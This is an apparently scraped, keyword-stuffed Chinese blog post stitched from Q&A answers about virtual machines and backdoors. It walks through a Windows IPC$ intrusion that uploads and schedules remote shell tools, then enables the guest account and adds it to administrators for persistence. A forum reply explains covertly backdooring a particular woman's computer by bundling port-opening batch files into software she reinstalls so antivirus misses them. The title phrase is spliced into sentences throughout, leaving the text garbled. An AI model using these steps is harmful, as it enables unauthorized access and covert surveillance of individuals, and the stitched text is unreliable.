置顶

虚拟机模拟黑客留后门,虚拟机后门什么意思

作者:hacker | 分类:脱壳 | 浏览:114 | 日期:2022年07月17日

目录:

跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘虚拟机模拟黑客留后门,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以之一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看虚拟机模拟黑客留后门你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1

再查查到时间没有虚拟机模拟黑客留后门?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤:

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功,连接你的肉鸡

常用的 *** 命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;

下面纯手打,上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

前几天叫人远程安装了一个虚拟机会不会留后门?我怕他设置了一些东西以后可以操作我的电脑

您好 ,LZ

一般情况下不会的。

一个名字而已,他肯定是随手打上去的。

如果您不放心的话,卸载掉重新安装即可。

百度里多半都有教程的。

如果您还有什么不懂的,可以在百度里HI我。

希望您采纳!

VMwear虚拟机跟黑客是不是有关系??请详细告诉我。。。

严格虚拟机模拟黑客留后门的说没关系虚拟机模拟黑客留后门,但玩黑客的时候很多时候都会用虚拟机模拟黑客留后门他搭建系统用来做渗透测试、就像通讯工具 *** 、YY等等、这些在黑产阔眼里可以跟别人通讯交流卖webshell

虚拟机环境有哪些安全隐患?

存在意见分歧 然而,对于在与其它计算设备一起使用时不安全的虚拟化也许是什么样子还没有结论。一般来说,正是虚拟化厂商宣传不存在安全问题。Secure Computing公司负责全球技术战略额副总裁Scott Montgomery说,虚拟化没有向安全环境中增加任何东西。它是节省成本的一种强大工具。但是,虚拟化不是万灵药。它不能解决你的全部问题。虚拟机不能降低安全。它只是让安全情况与原来不同。VMware公司的人说,虚拟化会增加安全。我不会走那么远。 其它担心的问题 虚拟化安全是这个行业中争论比较多的问题。有支持的也有反对的。 安全公司Core Security负责产品管理的副总裁Fred Pinkett说,一个防火墙是在硬件设备上设置的。现在,一个虚拟机环境中的所有的系统能够在防火墙外面进行通讯。产品现在能够控制虚拟机内部的这种情况。增加另一个层次和新的边界的任何东西都会产生新的安全问题。 人们也许不常听说涉及到利用虚拟化安全漏洞的引人注目的数据突破事件。但是,这并不意味着不存在这种可能性。如果好人能够发现这种安全漏洞,坏蛋也照样会发现这种漏洞。 虚拟环境与物理环境风险相同 Montgomery谨慎地指出,让我感到紧张的是虚拟化能够让你把许多数据放在一个物理平台上。这让虚拟化访问所有的平台。同一个地方的数据库和 *** 服务器可能存在风险。很少有厂商讨论这个问题。 访问服务器应用程序和数据能够更容易。如果一个服务器被攻破,另一个也面临风险,从而出现交叉的问题。 安全厂商坚持认为要特别对待在一个 *** 上的虚拟机环境中隐藏的漏洞。虚拟机软件厂商也许没有提供这些解决方案,需要第三方参与。 Stonesoft公司高级解决方案架构师Kim Lassila说,我认为人们要理解的关键问题是对于虚拟平台和物理平台来说,威胁都是一样的。不使用虚拟安全解决方案,要保护虚拟环境是很困难的。 他不补充说,有他的想法的人都不会不使用防火墙就把物理的企业 *** 连接到互联网。对于虚拟环境也是如此。 Lassila说,服务器、台式电脑和任何其它工作量在物理平台上与在虚拟平台上的风险是一样的。这是因为操作系统和软件应用程序是一样的。 黑客的诱惑Lassila担心的另一个问题是虚拟化有可能为黑客留下一个可利用的后门。有关虚拟化的两个因素使这个问题成为令人担心的问题。 一个因素是普遍存在的误解,认为虚拟化平台能够神奇地使虚拟化的服务器、台式电脑或者 *** 更安全。这样思考问题,管理员就不会认识到需要担心安全问题。 第二个因素是虚拟 *** 是无形的。因此,管理员不能物理地把一个 *** 分析器连接到虚拟 *** 以便观察通讯状况。

如何给个人主机留后门

虚拟机模拟黑客留后门你现在也没给分呀?

抓鸡早就不玩了?

看来你是个老手啊?

怎么连个后门都不会?

顺便说下虚拟机模拟黑客留后门,没分不帮...

============

晕!不还是一个意思吗?

什么叫抓鸡?如果你会抓鸡,应该知道如何来抓.

如果对方事先中了你的马,那也不叫什么抓鸡了。

无非就是先进入对方的机器,然后再中上马,这就

算抓到了一只,前提是先进入机器内,然后下马。

既然你会抓,为何不知道如何进入机器?

下马那是进去后再办的事,你如果会抓鸡也就代表

着你能进入她的机器,如果你连如何进入她的机器

都不会?那还怎么抓鸡?

真是晕呢!

不过既然再一次关注了这个问题,我就不仿教教你

另一方面也 *** *** 你的嚣张气焰,不会就是不会

别整没用的,请教问题就诚心点.

其实留后门和下马都是一个道理,就是想叫自己

今后可以轻而易举的进进出出,不过对于后门.

很多情况下都想到了“木马”。也可以这么说。

不过道上稍微有些头脑的人都知道,最隐秘、最

有效的后门不是在对方的机器上放什么“马”。

而是在对方的系统设置里动些手脚,在不安装额外

程序的同时,给自己留一个方便。

比如:

1:

开启“RPC相关服务”大约也就1-3个

然后利用"rECTON"就可以在对方不知道的情况下,

开启一个CMD后门,利用这个你可以给她开telnet.

等等... 总之,你获得了cmd还会愁吗?

这个前提是你要知道对方机器的密码...

2:

"bat、批处理"贴吧里有很多闲人,你叫他们给你

写个简单的批处理文件,加到启动项里。

这个.bat不是病毒,而是启动的自动开启一个端口

135、139...如果你会抓鸡应该知道,像这种可以

利用入侵的端口实在是不少.这个批处理就像个

糖衣炮弹,根本不会被杀软查杀。即使防火墙、

杀软更新了补丁、自动关闭了哪些端口。

只要再一开机,它还会自动运行这个.bat。然后

开一个口口方便你随时进入。

3:

你能想到在她电脑里留个门,也就意味着你有可能

会接触到她的电脑,只是想在自己方便时,随时进

去看看。那样就更好办了.她电脑不是联想自己带

的备份吗?如果在系统里动不了手脚,你还可以从

应用程序里下手,比如:她刚刚恢复了一下系统..

但是其他的应用软件她没有装,比如 *** 、MSN、UC

winrar、 *** 飞车、暴风影音、摄像头驱动...等等.

太多需要重新安装的了。

这样一来,你先准备好一个可以开“3389、telnet

rECTON应用服务、135、139等等”的批处理.

大小不过10k,也不会被查杀。然后将这个批处理

捆绑到以上应用程序里,系统恢复后,她毕竟得安

程序吧,只要她安装了以上任意一款程序,都会

自动把这个批处理填加到新系统里,不管她用什么

防火墙、杀软。当他安装的那一刻,后门已经悄悄

的打开了,并且还不是木马。

她是一个女生,本身安全防范意识就不怎么强。

她以为新恢复的系统很干净,根本不会去理会什么

3389、telnet、RPC服务、135、139...

这样你不就知道她机器开了什么吗?

她联想给她自带的系统你该不了,那你不会从她电

脑里的应用程序下手吗?死脑筋...

其实我说的都是一种概念,具体的你要问我怎么写

批处理、怎么开系统服务、怎么捆绑安全的代码.

我是不会跟你再罗嗦下去的,想办成的事,自己去

琢磨。主要还是 *** ...

总结:

在对方是新系统的情况下,想办法在应用程序

上着手,别老是认为她系统没开3389.就泄气.

再着,如果对方有杀软、防火墙。尽量不要

使用木马,尽量在安全设置上稍微开个方便就

够了,比如只需要打开一项系统服务rpc,就

够你去连的了.或着在其他软件上给她加个

批处理,安全又实在的打开必要的端口。这个

端口能够为你的入侵提供方便就足够了.

至于防火墙,就要看你的本事了.

如果你是个抓鸡老手,应该知道在本地发一个

什么样的数据会被对方拦截。

同样,你也会知道,利用什么东西打马虎眼来

个蒙混过关,给你个提醒 - 如 *** ...

你在和她聊Q的时候就可以实现.

哎!!! 自己琢磨去吧。

别以为别人会给你现成的东西。

毕竟你这一分都没有!

物理机被装后门会怎样?虚拟机上的后门木马会影响物理机吗?

物理机上有木马,后门木马说明你的机器完全被黑客控制,

而虚拟机上的木马程序不会影响到物理机上,(你的物理机上不能共享东西,以防它利用你虚拟机里的权限来入侵你的物理机,将物理机的所有共享关闭和来宾账户关掉,即可!!!)

一般虚拟机中病毒不会影响到物理机上。

发表评论

访客 游客 2022-07-17 · 回复该评论
?下马那是进去后再办的事,你如果会抓鸡也就代表着你能进入她的机器,如果你连如何进入她的机器都不会?那还怎么抓鸡?真是晕呢!不过既然再一次关注了这个问题,我就不仿教教你另一方面也刺激刺激你的嚣张气焰,不会就是不会别整没用的,请教问题就诚心点.其实留后门和下马都是一个道理,就是想叫自己今后

访客 游客 2022-07-18 · 回复该评论
安全的代码.我是不会跟你再罗嗦下去的,想办成的事,自己去琢磨。主要还是方法...总结: 在对方是新系统的情况下,想办法在应用程序 上着手,别老是认为她系统没开3389.就泄气. 再着,如果对方有杀软、防火墙。尽量不要 使用木马,尽量在安全设置上稍

访客 游客 2022-07-17 · 回复该评论
、批处理"贴吧里有很多闲人,你叫他们给你写个简单的批处理文件,加到启动项里。这个.bat不是病毒,而是启动的自动开启一个端口135、139...如果你会抓鸡应该知道,像这种可以利用入侵的端口实在是不少.这个批处理就像个糖衣炮弹,根本

访客 游客 2022-07-17 · 回复该评论
目录:1、跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有2、前几天叫人远程安装了一个虚拟机会不会留后门?我怕他设置了一些东西以后可以操作我的电脑3、VMwear虚拟机跟黑客是不是有关系??请详细告诉我。。。4、虚拟机环境有哪些安全隐患?5、如何给个

访客 游客 2022-07-18 · 回复该评论
划作业 at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt; 下面纯手打,上面是度娘给的taskkill /im 进程名 停止运行tasklisy 查看运行进程ipconfig 查看本机IPmd

取消
微信二维码
支付宝二维码